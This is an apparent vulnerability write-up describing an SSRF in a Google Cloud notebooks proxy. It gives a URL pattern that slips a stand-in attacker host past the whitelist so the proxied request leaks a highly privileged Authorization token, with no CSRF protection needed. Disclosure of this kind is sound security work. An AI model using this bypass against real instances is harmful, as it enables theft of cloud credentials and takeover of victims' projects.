Service had a proxy. You would go through the oauth flow to get access to Google data, then it had an endpoint that would proxy requests adding the Authorization: header to them to the google backend. Had some whitelisting so it should only proxy to Google API but https://{INSTANCE-ID}-dot-us-central1.notebooks.googleusercontent.com/aipn/v2/proxy/{attacker.com}/compute.googleapis.com/ it could get around that by including the computer url after the attacker url.

Getting the SSRF to hit the attacker page would disclose teh Authorization header, which had the Cloud-Platform permission, so highly privileged. Since this is a GET request with no CSRF protection, the only requirement is knowing the instance-id.